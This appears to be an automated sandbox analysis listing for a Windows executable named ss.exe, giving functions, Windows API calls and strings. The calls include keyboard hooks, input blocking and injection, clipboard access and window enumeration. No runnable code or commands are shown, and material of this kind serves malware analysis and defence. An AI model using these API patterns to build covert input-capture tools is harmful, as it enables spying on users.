Part of subcall function 00486A00: std::exception::exception.LIBCMT ref: 00486A4F

Strings

AtlAxGetControl, xrefs: 00455BEC
atl, xrefs: 00455BDD

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00477900, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78window

APIs

IsWindowVisible.USER32(?), ref: 0047790B
GetWindowLongA.USER32(?,000000EC), ref: 00477926
GetWindowTextA.USER32(?,?,00000014), ref: 00477938

Part of subcall function 00476AD0: GetWindowTextA.USER32(?,?,00007FFF), ref: 00476B06
Part of subcall function 00476AD0: GetWindowThreadProcessId.USER32(?,?), ref: 00476B2B
Part of subcall function 00476AD0: GetWindowThreadProcessId.USER32(?,?), ref: 00476B3E
Part of subcall function 00476AD0: GetClassNameA.USER32(?,?,00000101), ref: 00476B81

Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 00476741
Part of subcall function 00476690: IsWindow.USER32(00000000), ref: 004767D4
Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 004767FF
Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 00476858
Part of subcall function 00476690: _strncpy.LIBCMT ref: 0047688A
Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 004768F9
Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 0047691B
Part of subcall function 00476690: _strncpy.LIBCMT ref: 0047694B
Part of subcall function 00476690: _strncpy.LIBCMT ref: 00476A10
Part of subcall function 00476690: _strncpy.LIBCMT ref: 00476A75

Part of subcall function 00476B90: __Stoull.NTSTC_LIBCMT ref: 00476C32
Part of subcall function 00476B90: __Stoull.NTSTC_LIBCMT ref: 00476DB9
Part of subcall function 00476B90: EnumChildWindows.USER32(00000000,00475CF0,?), ref: 00476E31

Strings

Program Manager, xrefs: 00477946

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042CBBC, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75

APIs

Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9

_strncpy.LIBCMT ref: 0042CC2A

Strings

--->, xrefs: 0042CC14
jjj, xrefs: 0042CC61
Line#, xrefs: 0042CBEE

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0048DA7F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ss.exe,00000104), ref: 0048DAAB
_parse_cmdline.LIBCMT ref: 0048DAD6

Part of subcall function 0048ABFE: Sleep.KERNEL32(00000000,00000001,004011C4,?,004896B2,00000018,004A17D8,0000000C,00489742,004011C4,004011C4,?,0048893F,0000000D,?,0048A041), ref: 0048AC1F

_parse_cmdline.LIBCMT ref: 0048DB17

Strings

C:\Users\user\Desktop\ss.exe, xrefs: 0048DA9E, 0048DAA3

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004034E0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61

APIs

GetTickCount.KERNEL32(?,001B3348,0040333F), ref: 004035B7

Part of subcall function 00415720: LoadImageA.USER32(00400000,?,00000001,00000000,00000000,00008000), ref: 004157DB
Part of subcall function 00415720: Shell_NotifyIcon.SHELL32(00000001,004AC10A), ref: 004157F0

SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,?,001B3348,0040333F), ref: 00403545

Strings

C:\Users\user\Desktop, xrefs: 00403540
e, xrefs: 00403560

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00469FF0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32window

APIs

SetMenuItemInfoA.USER32 ref: 0046A023
DeleteObject.GDI32(00000000), ref: 0046A036
DestroyCursor.USER32(00000000), ref: 0046A050

Strings

0, xrefs: 0046A00B

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00472DE0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27

APIs

GetCurrentProcess.KERNEL32(?,?,0043485C,?,?,Col,Focused,?,00000000), ref: 00472DEE
IsWow64Process.KERNEL32(00000000,?,0043485C,?,?,Col,Focused,?,00000000), ref: 00472DF5
IsWow64Process.KERNEL32(\HC,?,?,0043485C,?,?,Col,Focused,?,00000000), ref: 00472E0E

Strings

\HC, xrefs: 00472E05, 00472E0D

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042D080, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21library

APIs

GetModuleHandleA.KERNEL32(user32,BlockInput,00427E02,004987E9), ref: 0042D09A
GetProcAddress.KERNEL32(00000000), ref: 0042D0A1

Strings

BlockInput, xrefs: 0042D090
user32, xrefs: 0042D095

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00495510, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7library

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0049551A
GetProcAddress.KERNEL32(00000000), ref: 00495521

Strings

IsWow64Process, xrefs: 00495510
kernel32, xrefs: 00495515

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00495440, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7library

APIs

GetModuleHandleA.KERNEL32(user32,SendInput), ref: 0049544A
GetProcAddress.KERNEL32(00000000), ref: 00495451

Strings

SendInput, xrefs: 00495440
user32, xrefs: 00495445

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00475860, Relevance: 6.1, APIs: 4, Instructions: 132window

APIs

GetForegroundWindow.USER32 ref: 004758A8
IsWindowVisible.USER32(00000000), ref: 004758C4
GetForegroundWindow.USER32 ref: 004758F7
IsWindowVisible.USER32(00000000), ref: 00475960

Part of subcall function 00476AD0: GetWindowTextA.USER32(?,?,00007FFF), ref: 00476B06
Part of subcall function 00476AD0: GetWindowThreadProcessId.USER32(?,?), ref: 00476B2B
Part of subcall function 00476AD0: GetWindowThreadProcessId.USER32(?,?), ref: 00476B3E
Part of subcall function 00476AD0: GetClassNameA.USER32(?,?,00000101), ref: 00476B81

Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 00476741
Part of subcall function 00476690: IsWindow.USER32(00000000), ref: 004767D4
Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 004767FF
Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 00476858
Part of subcall function 00476690: _strncpy.LIBCMT ref: 0047688A
Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 004768F9
Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 0047691B
Part of subcall function 00476690: _strncpy.LIBCMT ref: 0047694B
Part of subcall function 00476690: _strncpy.LIBCMT ref: 00476A10
Part of subcall function 00476690: _strncpy.LIBCMT ref: 00476A75

Part of subcall function 00476B90: __Stoull.NTSTC_LIBCMT ref: 00476C32
Part of subcall function 00476B90: __Stoull.NTSTC_LIBCMT ref: 00476DB9
Part of subcall function 00476B90: EnumChildWindows.USER32(00000000,00475CF0,?), ref: 00476E31

Part of subcall function 00475C20: IsWindow.USER32(?), ref: 00475C2E
Part of subcall function 00475C20: IsWindowVisible.USER32(?), ref: 00475C48
Part of subcall function 00475C20: GetWindowLongA.USER32(?,000000F0), ref: 00475C5B

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00404800, Relevance: 6.1, APIs: 4, Instructions: 119thread

APIs

CallNextHookEx.USER32(00000000,?,?,?), ref: 00404819
GetForegroundWindow.USER32 ref: 004048E0
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004048ED
GetKeyboardLayout.USER32(00000000), ref: 004048F8

Part of subcall function 00411970: VkKeyScanExA.USER32(00000020,00000000), ref: 004119F6

Part of subcall function 00404B30: GetTickCount.KERNEL32 ref: 00404BB6
Part of subcall function 00404B30: GetForegroundWindow.USER32 ref: 00404BE7
Part of subcall function 00404B30: PostMessageA.USER32(000601DA,00000418,0000000C,00000000), ref: 00404C0C
Part of subcall function 00404B30: GetKeyState.USER32(00000090), ref: 00404CC8
Part of subcall function 00404B30: FindWindowA.USER32(#32771,00000000), ref: 00404E3E
Part of subcall function 00404B30: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00404E4B
Part of subcall function 00404B30: GetCurrentThreadId.KERNEL32 ref: 00404E53
Part of subcall function 00404B30: FindWindowA.USER32(#32768,00000000), ref: 0040503C
Part of subcall function 00404B30: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00405049

Part of subcall function 00412130: MapVirtualKeyA.USER32(0040B185,00000000), ref: 0041221B

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0045063F, Relevance: 6.1, APIs: 4, Instructions: 103timewindow

APIs

SendMessageTimeoutA.USER32(?,000000B0,?,?,00000002,000007D0,?), ref: 0045065E
SendMessageTimeoutA.USER32(?,000000C9,?,00000000,00000002,000007D0,?), ref: 0045067F
SendMessageTimeoutA.USER32(?,000000C9,?,00000000,00000002,000007D0,00000000), ref: 004506A8
SendMessageTimeoutA.USER32(?,000000C9,?,00000000,00000002,000007D0,00000000), ref: 004506D5

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004341C0, Relevance: 6.1, APIs: 4, Instructions: 100threadwindow

APIs

Part of subcall function 00441960: GetForegroundWindow.USER32 ref: 00441987
Part of subcall function 00441960: IsWindowVisible.USER32(00000000), ref: 004419A2

Part of subcall function 00476090: _strncpy.LIBCMT ref: 004760FE
Part of subcall function 00476090: EnumChildWindows.USER32(?,004761B0,?), ref: 0047613C
Part of subcall function 00476090: EnumChildWindows.USER32(?,004761B0,?), ref: 00476166
Part of subcall function 00476090: GetWindowLongA.USER32(?,000000F0), ref: 0047617C

GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043423E
AttachThreadInput.USER32(00000E10,00000000,00000000), ref: 004342BD

Part of subcall function 00476550: GetModuleHandleA.KERNEL32(user32,IsHungAppWindow,?,004755DA), ref: 00476576
Part of subcall function 00476550: GetProcAddress.KERNEL32(00000000,?,004755DA), ref: 0047657D
Part of subcall function 00476550: SendMessageTimeoutA.USER32(00000000,00000000,00000000,00000000,00000002,00001388,00000000), ref: 004765AF

AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 00434266
SetFocus.USER32(?), ref: 00434276

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0046E3C0, Relevance: 6.1, APIs: 4, Instructions: 99

APIs

GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 0046E3E1
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0046E3F6
WritePrivateProfileSectionA.KERNEL32(?,?,?), ref: 0046E442
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0046E457

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00476AD0, Relevance: 6.1, APIs: 4, Instructions: 58thread

APIs

GetWindowTextA.USER32(?,?,00007FFF), ref: 00476B06
GetWindowThreadProcessId.USER32(?,?), ref: 00476B2B
GetWindowThreadProcessId.USER32(?,?), ref: 00476B3E

Part of subcall function 0044E300: OpenProcess.KERNEL32(00000410,00000000,?,7619EDFA,?,?,00000000), ref: 0044E31F
Part of subcall function 0044E300: OpenProcess.KERNEL32(00001000,00000000,?), ref: 0044E32E
Part of subcall function 0044E300: GetModuleBaseNameA.PSAPI(00000000,00000000,?,00000104), ref: 0044E354
Part of subcall function 0044E300: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 0044E35C
Part of subcall function 0044E300: GetModuleHandleA.KERNEL32(psapi,GetProcessImageFileNameA), ref: 0044E37E
Part of subcall function 0044E300: GetProcAddress.KERNEL32(00000000), ref: 0044E385
Part of subcall function 0044E300: CloseHandle.KERNEL32(00000000), ref: 0044E3F6
Part of subcall function 0044E300: QueryDosDeviceA.KERNEL32(?,?,00000104), ref: 0044E424
Part of subcall function 0044E300: __Stoull.NTSTC_LIBCMT ref: 0044E43B
Part of subcall function 0044E300: CloseHandle.KERNEL32(00000000), ref: 0044E45C
Part of subcall function 0044E300: CloseHandle.KERNEL32(00000000), ref: 0044E495

GetClassNameA.USER32(?,?,00000101), ref: 00476B81

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0045C710, Relevance: 6.1, APIs: 4, Instructions: 51window

APIs

GetMenu.USER32(?), ref: 0045C73C
IsWindowVisible.USER32(?), ref: 0045C750
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0045C772
RedrawWindow.USER32(?,00000000,00000000,00000501), ref: 0045C789

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00404450, Relevance: 6.0, APIs: 4, Instructions: 45clipboard

APIs

GlobalUnWire.KERNEL32(00000000), ref: 0040446C
CloseClipboard.USER32 ref: 00404471
GlobalUnWire.KERNEL32(00000000), ref: 00404485
GlobalFree.KERNEL32(00000000), ref: 00404495

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004782A0, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 354

Strings

Q\E, xrefs: 004784AB

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00407167, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173string

APIs

Part of subcall function 00471FA0: CharLowerA.USER32(?), ref: 00471FAF
Part of subcall function 00471FA0: CharLowerA.USER32 ref: 00471FB8
Part of subcall function 00471FA0: CharLowerA.USER32(?), ref: 00471FCC

Part of subcall function 00471FF0: CharLowerA.USER32(?), ref: 00472008
Part of subcall function 00471FF0: CharUpperA.USER32 ref: 00472023
Part of subcall function 00471FF0: CharLowerA.USER32(00000000), ref: 0047204C
Part of subcall function 00471FF0: CharUpperA.USER32(?), ref: 00472061
Part of subcall function 00471FF0: CharLowerA.USER32 ref: 0047209A
Part of subcall function 00471FF0: CharLowerA.USER32(00000000), ref: 004720A7
Part of subcall function 00471FF0: CharLowerA.USER32(00000000), ref: 004720C1
Part of subcall function 00471FF0: CharLowerA.USER32(?), ref: 004720CF
Part of subcall function 00471FF0: CharLowerA.USER32(?), ref: 004720EB
Part of subcall function 00471FF0: CharLowerA.USER32(00000000), ref: 004720F8

CharLowerA.USER32(?), ref: 0040720C
CharLowerA.USER32 ref: 00407216
IsCharAlphaNumericA.USER32(?), ref: 00407244

Part of subcall function 00409680: SendMessageTimeoutA.USER32(000601DA,00000419,?,?,00000003,000003E8,?), ref: 0040970D

IsCharLowerA.USER32 ref: 00407305
IsCharUpperA.USER32(00000000), ref: 00407313
IsCharUpperA.USER32 ref: 00407329
IsCharLowerA.USER32(00000000), ref: 00407384
ToAsciiEx.USER32(?,?,?,?,00000000,?), ref: 004074C0
lstrcmpi.KERNEL32(00000000), ref: 00407690

Strings

-()[]{}:;'"/\,.?! , xrefs: 004071A0

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0048D809, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129

APIs

_strlen.LIBCMT ref: 0048D833

Part of subcall function 0048AC43: Sleep.KERNEL32(00000000,004719BE,004011C4), ref: 0048AC6B

_strlen.LIBCMT ref: 0048D864

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

Part of subcall function 00489164: GetCurrentProcess.KERNEL32(C0000417,004719BE,004011C4), ref: 0048917A
Part of subcall function 00489164: TerminateProcess.KERNEL32(00000000), ref: 00489181

Part of subcall function 0048D5CD: x_ismbbtype_l.LIBCMT ref: 0048D5DB

Strings

, xrefs: 0048D967

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0040B610, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107

APIs

_strncpy.LIBCMT ref: 0040B633

Part of subcall function 0040BA80: GetKeyboardLayout.USER32(00000000), ref: 0040BB04
Part of subcall function 0040BA80: __Stoull.NTSTC_LIBCMT ref: 0040BCB7

Part of subcall function 0040B730: _strncpy.LIBCMT ref: 0040B92A
Part of subcall function 0040B730: _strncpy.LIBCMT ref: 0040B9A4

Strings

~, xrefs: 0040B689
& , xrefs: 0040B63E

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00475270, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98

APIs

WideCharToMultiByte.KERNEL32(00000000), ref: 00475290
WideCharToMultiByte.KERNEL32(00000000,00000400,0049E27C,0044570B,004ABB26,00000000,?,00000000,00000000,00000001,00000000), ref: 00475303

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Strings

?, xrefs: 0047528B

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0043D270, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95

APIs

Part of subcall function 0042F580: __Stoull.NTSTC_LIBCMT ref: 0042F5F5

_strncpy.LIBCMT ref: 0043D2B9
SetVolumeLabelA.KERNEL32(?,?), ref: 0043D303

Part of subcall function 0043CE10: _strncpy.LIBCMT ref: 0043CE47
Part of subcall function 0043CE10: GetModuleHandleA.KERNEL32(kernel32,GetDiskFreeSpaceExA), ref: 0043CEA3
Part of subcall function 0043CE10: GetProcAddress.KERNEL32(00000000), ref: 0043CEAA
Part of subcall function 0043CE10: GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0043CF23

Strings

\, xrefs: 0043D2DB

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
